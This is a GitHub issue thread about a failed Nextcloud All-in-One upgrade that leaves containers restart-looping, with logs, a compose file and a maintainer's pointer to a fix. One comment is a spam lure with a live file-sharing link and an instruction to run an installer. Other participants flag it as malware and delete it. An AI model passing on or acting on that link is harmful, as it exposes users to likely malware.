### ISSUE TITLE
Update fails, blocks starting and stopping containers

### ISSUE THREAD

**Issue by tofuwabohu** [nextcloud/all-in-one#5167]
Containers do not come up after being stopped because there's a failed upgrade in the nextcloud contianer.
It seems like I am not able to pause the updates so this happens every time I want to stop/start.

### Steps to reproduce
1. Stop all containers
2. Start all containers

### Expected behavior 
The containers should get up.

### Actual behavior 
The following containers are permanetly restarting:

- Apache
- Nextcloud
- Notify Push

The Nextcloud container logs the following:

> Upgrading nextcloud from 28.0.1.1 to 29.0.4.1...
> Nextcloud or one of the apps require upgrade - only a limited number of commands are available
> You may use your browser or the occ upgrade command to do the upgrade
> System config value integrity.check.disabled deleted
> Nextcloud or one of the apps require upgrade - only a limited number of commands are available
> You may use your browser or the occ upgrade command to do the upgrade
> Setting log level to debug
> Turned on maintenance mode
> 
> In DbalException.php line 71:
>                                                                                
>   An exception occurred while executing a query: SQLSTATE[42703]: Undefined c  
>   olumn: 7 ERROR:  column "lazy" of relation "oc_appconfig" does not exist     
>   LINE 1: INSERT INTO "oc_appconfig" ("appid", "lazy", "type", "config...      
>                                                ^                               
>                                                                                
> 
> In ExceptionConverter.php line 68:
>                                                                                
>   An exception occurred while executing a query: SQLSTATE[42703]: Undefined c  
>   olumn: 7 ERROR:  column "lazy" of relation "oc_appconfig" does not exist     
>   LINE 1: INSERT INTO "oc_appconfig" ("appid", "lazy", "type", "config...      
>                                                ^                               
>                                                                                
> 
> In Exception.php line 28:
>                                                                                
>   SQLSTATE[42703]: Undefined column: 7 ERROR:  column "lazy" of relation "oc_  
>   appconfig" does not exist                                                    
>   LINE 1: INSERT INTO "oc_appconfig" ("appid", "lazy", "type", "config...      
>                                                ^                               
>                                                                                
> 
> In Statement.php line 130:
>                                                                                
>   SQLSTATE[42703]: Undefined column: 7 ERROR:  column "lazy" of relation "oc_  
>   appconfig" does not exist                                                    
>   LINE 1: INSERT INTO "oc_appconfig" ("appid", "lazy", "type", "config...      
> 

And then repeatedly:

> Connection to nextcloud-aio-database (172.26.0.3) 5432 port [tcp/postgresql] succeeded!
>               now              
> -------------------------------
>  2024-08-25 08:52:26.132084+00
> (1 row)
> 
> + '[' -f /dev-dri-group-was-added ']'
> ++ find /dev -maxdepth 1 -mindepth 1 -name dri
> + '[' -n '' ']'
> + set +x
> Connection to nextcloud-aio-redis (172.26.0.4) 6379 port [tcp/redis] succeeded!
> The last Nextcloud update failed.
> Please restore from backup and try again!
> If you do not have a backup in place, you can simply delete the update.failed file in the datadir which will allow the container to start again.

Full logs: https://gist.github.com/tofuwabohu/88670cf44be8ca7774a537ac6e04dc17

Apache and Notify Push are waiting for the nextcloud container.

Restoring from backup works until they stop next time.

### Host OS 
Ubuntu 22.04

#### Docker run command or docker-compose file that you used
$ cat docker-compose.yaml 
```
services:
  nextcloud-aio-mastercontainer:
    image: nextcloud/all-in-one:latest
    init: true
    restart: always
    container_name: nextcloud-aio-mastercontainer # This line is not allowed to be changed as otherwise AIO will not work correctly
    volumes:
      - nextcloud_aio_mastercontainer:/mnt/docker-aio-config # This line is not allowed to be changed as otherwise the built-in backup solution will not work
      - /var/run/docker.sock:/var/run/docker.sock:ro # May be changed on macOS, Windows or docker rootless. See the applicable documentation. If adjusting, don't forget to also set 'WATCHTOWER_DOCKER_SOCKET_PATH'!
    ports:
      - 8080:8080
    environment: # Is needed when using any of the options below
       - APACHE_PORT: 11000 # Is needed when running behind a web server or reverse proxy (like Apache, Nginx, Cloudflare Tunnel and else). See https://github.com/nextcloud/all-in-one/blob/main/reverse-proxy.md
       - APACHE_IP_BINDING: 127.0.0.1 # Should be set when running behind a web server or reverse proxy (like Apache, Nginx, Cloudflare Tunnel and else) that is running on the same host. See https://github.com/nextcloud/all-in-one/blob/main/reverse-proxy.m
       - NEXTCLOUD_DATADIR: /mnt/HC_Volume_xxx/nextcloud/nc-aio # Allows to set the host directory for Nextcloud's datadir. ⚠⚠⚠ Warning: do not set or adjust this value after the initial Nextcloud installation is done! See https://github.com/nextcloud/all-in-one#how-to-change-the-default-location-of-nextclouds-datadir
       - BORG_RETENTION_POLICY: --keep-within=2d --keep-weekly=1 --keep-monthly=1 # Allows to adjust borgs retention policy. See https://github.com/nextcloud/all-in-one#how-to-adjust-borgs-retention-policy


volumes: # If you want to store the data on a different drive, see https://github.com/nextcloud/all-in-one#how-to-store-the-filesinstallation-on-a-separate-drive
  nextcloud_aio_mastercontainer:
    name: nextcloud_aio_mastercontainer # This line is not allowed to be changed as otherwise the built-in backup solution will not work
```

#### Nextcloud AIO version 
v9.4.1

#### Other valuable info 
The same happens when I enable the daily updates in the AIO interface. Removing update failed and manually running occ upgrade via also gets the same result.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by tofuwabohu** [comment]
> Download https://mega.nz/file/redacted In the installer menu, select "gcc."

Whoever reads this reply, it's most likely some harmful software. Do not download the above.

**Comment by docjyJ** [comment]
> > Download https://mega.nz/file/redacted In the installer menu, select "gcc."
> 
> Whoever reads this reply, it's malware. Do not download the above. Reported.

Thanks, I deleted the comment

**Comment by szaimen** [comment]
Hi, this should be resolved in the next AIO update with https://github.com/nextcloud/all-in-one/pull/5106.

Also see https://github.com/nextcloud/all-in-one/issues/5102#issuecomment-2273257066

**Comment by szaimen** [comment]
This is now released with 7.5.0 Beta. Testing and feedback is welcome! See https://github.com/nextcloud/all-in-one#how-to-switch-the-channel
